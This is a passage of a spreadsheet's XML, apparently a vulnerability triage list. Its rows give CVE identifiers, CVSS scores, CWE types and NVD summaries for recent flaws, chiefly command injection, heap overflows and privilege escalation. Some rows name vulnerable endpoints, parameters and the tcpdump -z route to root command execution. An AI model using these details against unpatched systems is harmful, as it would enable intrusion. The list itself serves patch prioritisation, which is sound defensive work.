        </is>
      </c>
      <c r="H932" s="5" t="inlineStr"/>
      <c r="I932" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J932" s="5" t="inlineStr"/>
      <c r="K932" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L932" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73013</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73016</t>
        </is>
      </c>
      <c r="C933" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D933" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E933" s="5" t="inlineStr"/>
      <c r="F933" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G933" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H9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33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J933" s="5" t="inlineStr"/>
      <c r="K933" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L933" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73018</t>
        </is>
      </c>
      <c r="C934" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D934" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E934" s="5" t="inlineStr"/>
      <c r="F934" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G934" s="5" t="inlineStr"/>
      <c r="H934" s="5" t="inlineStr"/>
      <c r="I934" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J934" s="5" t="inlineStr"/>
      <c r="K934" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L934" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73018</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73023</t>
        </is>
      </c>
      <c r="C935" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D935" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E935" s="5" t="inlineStr"/>
      <c r="F935" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G935" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H935" s="5" t="inlineStr"/>
      <c r="I935" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J935" s="5" t="inlineStr"/>
      <c r="K935" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L935" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73023</t>
        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73028</t>
        </is>
      </c>
      <c r="C936" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D936" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E936" s="5" t="inlineStr"/>
      <c r="F936" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G936" s="5" t="inlineStr"/>
      <c r="H936" s="5" t="inlineStr"/>
      <c r="I936" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J936" s="5" t="inlineStr"/>
      <c r="K936" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L936" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73222</t>
        </is>
      </c>
      <c r="C937" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D937" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E937" s="5" t="inlineStr"/>
      <c r="F937" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G937" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H937" s="5" t="inlineStr"/>
      <c r="I937" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J937" s="5" t="inlineStr"/>
      <c r="K937" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-352, CWE-78</t>
        </is>
      </c>
      <c r="L937" s="5" t="inlineStr">
        <is>
          <t>Claude Code Templates is a CLI tool for configuring and monitoring Claude Code. Prior to 1.29.4, the Claude Code Studio server launched by the --studio option in cli-tool/src/sandbox-server.js binds to all interfaces on port 3444, permits cross-origin requests, and requires no authentication. The POST /api/execute endpoint passes the prompt request-body field to executeLocalTask(), and POST /api/install-agent passes the agentName request-body field to a child process. The same unsafe agent field path is reachable from /api/execute through checkAndInstallAgent(). These attacker-controlled values reach child_process.spawn() with shell execution enabled, causing Node.js to construct a shell command in which metacharacters are interpreted. An attacker who can reach the port directly, or who convinces a developer running Studio to visit a malicious website, can execute arbitrary operating-system commands with the developer's privileges and compromise source code, credentials, and local data. This issue is fixed in version 1.29.4.</t>
        </is>
      </c>
      <c r="M937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73222</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73224</t>
        </is>
      </c>
      <c r="C938" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D938" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E938" s="5" t="inlineStr"/>
      <c r="F938" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G938" s="5" t="inlineStr"/>
      <c r="H938" s="5" t="inlineStr"/>
      <c r="I938" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J938" s="5" t="inlineStr"/>
      <c r="K938" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L938" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.15.120, electerm allows a malicious FTP or SFTP server to execute arbitrary commands when a user downloads a crafted folder and invokes Properties and Calculate Size because calcLocal in src/client/components/sftp/file-info-modal.jsx inserts the server-controlled folder name into a du -sh shell command without safely escaping single quotes. This issue is fixed in version 3.15.120.</t>
        </is>
      </c>
      <c r="M938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73224</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73226</t>
        </is>
      </c>
      <c r="C939" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D939" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E939" s="5" t="inlineStr"/>
      <c r="F939" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G939" s="5" t="inlineStr"/>
      <c r="H939" s="5" t="inlineStr"/>
      <c r="I939" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J939" s="5" t="inlineStr"/>
      <c r="K939" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="L939" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.15.186, electerm allows an authenticated WebSocket client to invoke unintended internal functions through client-controlled func values in upgrade-func in src/app/server/dispatch-center.js and handleFs in src/app/server/fs.js, exposing Upgrade and fsExport methods that can execute commands, open files, mutate the filesystem, or terminate the process. This issue is fixed in version 3.15.186.</t>
        </is>
      </c>
      <c r="M939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73226</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73284</t>
        </is>
      </c>
      <c r="C940" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D940" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E940" s="5" t="inlineStr"/>
      <c r="F940" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G940" s="5" t="inlineStr"/>
      <c r="H940" s="5" t="inlineStr"/>
      <c r="I940" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J940" s="5" t="inlineStr"/>
      <c r="K940" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L940" s="5" t="inlineStr">
        <is>
          <t>RustFS is a distributed object storage system built in Rust. RustFS AddServiceAccount in rustfs/src/admin/handlers/service_account.rs accepts an attacker-controlled target_user after only checking CreateServiceAccountAdminAction, passes it to new_service_account, and prepare_service_account_auth sets is_owner for the resulting root-parent service account. This issue is fixed in version 1.0.0-beta.11.</t>
        </is>
      </c>
      <c r="M940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73284</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73293</t>
        </is>
      </c>
      <c r="C941" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D941" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E941" s="5" t="inlineStr"/>
      <c r="F941" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G941" s="5" t="inlineStr"/>
      <c r="H941" s="5" t="inlineStr"/>
      <c r="I941" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J941" s="5" t="inlineStr"/>
      <c r="K941" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L941" s="5" t="inlineStr">
        <is>
          <t>Semaphore UI is a web interface for managing DevOps tools.  Prior to 2.18.19 and from 2.19.0-alpha3 until 2.19.5-beta5, ProjectMiddleware and GetProjectOrGlobalRoleBySlug allow a project manager to use POST /api/project/{id}/roles to create a custom manager role with permission bitmask 15, overriding the built-in manager permissions and granting CanUpdateProject and CanManageProjectUsers owner capabilities. This issue is fixed in versions 2.18.19 and 2.19.5-beta5.</t>
        </is>
      </c>
      <c r="M941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73293</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73305</t>
        </is>
      </c>
      <c r="C942" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D942" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E942" s="5" t="inlineStr"/>
      <c r="F942" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G942" s="5" t="inlineStr"/>
      <c r="H942" s="5" t="inlineStr"/>
      <c r="I942" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J942" s="5" t="inlineStr"/>
      <c r="K942" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L942" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.24, POST /api/public/v1/roles/assign called validateGlobalRoleUpdate without checking appBuilder.appId or role.appId in packages/server/src/api/controllers/public/globalRoleValidation.ts. An app-scoped builder could scope the request to an app they control and then grant themselves builder access or an arbitrary role in another app, exposing that app data, datasource configuration, and automations. This issue is fixed in version 3.39.24.</t>
        </is>
      </c>
      <c r="M942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73305</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73667</t>
        </is>
      </c>
      <c r="C943" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D943" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E943" s="5" t="inlineStr"/>
      <c r="F943" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G943" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H943" s="5" t="inlineStr"/>
      <c r="I943" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J943" s="5" t="inlineStr"/>
      <c r="K943" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L943" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.0.4, 1.1.4, and 1.2.0-rc.2, OpenChoreo Workflow Plane templates under samples/getting-started/workflow-templates/ interpolated developer-controlled workflow parameters into shell program text executed through sh -c instead of passing the values through container.env, allowing arbitrary commands to run in workflow pods while affected privileged Podman templates lacked hostUsers: false. This issue is fixed in versions 1.0.4, 1.1.4, and 1.2.0-rc.2.</t>
        </is>
      </c>
      <c r="M943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73667</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73753</t>
        </is>
      </c>
      <c r="C944" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D944" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E944" s="5" t="inlineStr"/>
      <c r="F944" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G944" s="5" t="inlineStr"/>
      <c r="H944"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I944" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J944" s="5" t="inlineStr"/>
      <c r="K944" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L944" s="5" t="inlineStr">
        <is>
          <t>Exploitation through affected command-line operations could allow an authenticated low-privileged user to execute arbitrary commands as a privileged user on the underlying operating system.</t>
        </is>
      </c>
      <c r="M944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73753</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73763</t>
        </is>
      </c>
      <c r="C945" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D945" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E945" s="5" t="inlineStr"/>
      <c r="F945" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G945" s="5" t="inlineStr"/>
      <c r="H945"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I945" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J945" s="5" t="inlineStr"/>
      <c r="K945" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L945" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in a management component that could allow an unauthenticated adjacent attacker to execute arbitrary commands. Successful exploitation could result in remote execution of arbitrary commands in the context of the affected utility.</t>
        </is>
      </c>
      <c r="M945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73763</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73784</t>
        </is>
      </c>
      <c r="C946" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D946" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E946" s="5" t="inlineStr"/>
      <c r="F946" s="5" t="inlineStr"/>
      <c r="G946" s="5" t="inlineStr"/>
      <c r="H946" s="5" t="inlineStr"/>
      <c r="I946" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J946" s="5" t="inlineStr"/>
      <c r="K946" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L946" s="5" t="inlineStr">
        <is>
          <t>A potential security vulnerability in HPE IceWall products could be exploited to tamper SAML response, allowing an attacker to impersonate another user.</t>
        </is>
      </c>
      <c r="M946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73784</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73841</t>
        </is>
      </c>
      <c r="C947" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D947" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E947" s="5" t="inlineStr"/>
      <c r="F947" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G947" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H947" s="5" t="inlineStr"/>
      <c r="I947" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J947" s="5" t="inlineStr"/>
      <c r="K947" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L947" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.1.6 and 1.2.3, internal/openchoreo-api/api/handlers/exec.go and internal/openchoreo-api/api/handlers/wirelogs.go authorize component:exec and wirelogs:view using the caller-supplied project query parameter instead of comp.Spec.Owner.ProjectName, allowing a user with a project-scoped grant to execute commands in and read wirelogs from components owned by other projects in the same namespace. This vulnerability is fixed in 1.1.6 and 1.2.3.</t>
        </is>
      </c>
      <c r="M947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73841</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74997</t>
        </is>
      </c>
      <c r="C948" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D948" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E948" s="5" t="inlineStr"/>
      <c r="F948" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G948" s="5" t="inlineStr"/>
      <c r="H948" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I948" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J948" s="5" t="inlineStr"/>
      <c r="K948" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L948" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, the cmd_learn driver of the markasjunk plugin is subject to remote code execution via crafted placeholder replacement values. This issue only affects Roundcube instances using the markasjunk plugin with its cmd_learn driver.</t>
        </is>
      </c>
      <c r="M948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74997</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75007</t>
        </is>
      </c>
      <c r="C949" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D949" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E949" s="5" t="inlineStr"/>
      <c r="F949" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G949" s="5" t="inlineStr"/>
      <c r="H949" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I949" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J949" s="5" t="inlineStr"/>
      <c r="K949" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L949" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, the LDAP search filter was subject to injection via unescaped %u/%fu/%d substitution, which may lead to information disclosure or privilege escalation.</t>
        </is>
      </c>
      <c r="M949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75007</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75161</t>
        </is>
      </c>
      <c r="C950" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D950" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E950" s="5" t="inlineStr"/>
      <c r="F950" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G950" s="5" t="inlineStr"/>
      <c r="H950" s="5" t="inlineStr"/>
      <c r="I950" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J950" s="5" t="inlineStr"/>
      <c r="K950" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L950" s="5" t="inlineStr">
        <is>
          <t>An issue in the ugw-restart method of /cgi-bin/wwwugw.cgi in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with the low-privileged Standard role to inject arbitrary code into the dpcheck system utility executed as root.</t>
        </is>
      </c>
      <c r="M950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75161</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75166</t>
        </is>
      </c>
      <c r="C951" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D951" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E951" s="5" t="inlineStr"/>
      <c r="F951" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G951" s="5" t="inlineStr"/>
      <c r="H951" s="5" t="inlineStr"/>
      <c r="I951" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J951" s="5" t="inlineStr"/>
      <c r="K951" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-276</t>
        </is>
      </c>
      <c r="L951" s="5" t="inlineStr">
        <is>
          <t>Insecure Permission vulnerability in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows the low-privileged service user to execute /usr/bin/tcpdump as root without a password. By leveraging the tcpdump -z option, an authenticated attacker can achieve arbitrary command execution.</t>
        </is>
      </c>
      <c r="M951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75166</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75169</t>
        </is>
      </c>
      <c r="C952" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D952" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E952" s="5" t="inlineStr"/>
      <c r="F952" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G952" s="5" t="inlineStr"/>
      <c r="H952" s="5" t="inlineStr"/>
      <c r="I952" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J952" s="5" t="inlineStr"/>
      <c r="K952" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L952" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file upload vulnerability in /cgi-bin/ugwupload.cgi of MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with Admin role to upload files with arbitrary content to hardcoded paths.</t>
        </is>
      </c>
      <c r="M952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75169</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75339</t>
        </is>
      </c>
      <c r="C953" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D953" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E953" s="5" t="inlineStr"/>
      <c r="F953" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G953" s="5" t="inlineStr"/>
      <c r="H953" s="5" t="inlineStr"/>
      <c r="I953" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J953" s="5" t="inlineStr"/>
      <c r="K953" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L953" s="5" t="inlineStr">
        <is>
          <t>The storage endpoint /storage/upload of cjbi admin3 v3.0.0 are missing permission checks. /Any logged-in user can upload arbitrary files, and any anonymous attacker can download them.</t>
        </is>
      </c>
      <c r="M953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75339</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75624</t>
        </is>
      </c>
      <c r="C954" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D954" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E954" s="5" t="inlineStr"/>
      <c r="F954" s="5" t="inlineStr"/>
      <c r="G954" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H954" s="5" t="inlineStr"/>
      <c r="I954" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J954" s="5" t="inlineStr"/>
      <c r="K954" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L954" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.27 could allow a remote authenticated attacker to bypass security restrictions due to incorrect authorization.</t>
        </is>
      </c>
      <c r="M954" s="6" t="inlineStr">
        <is>
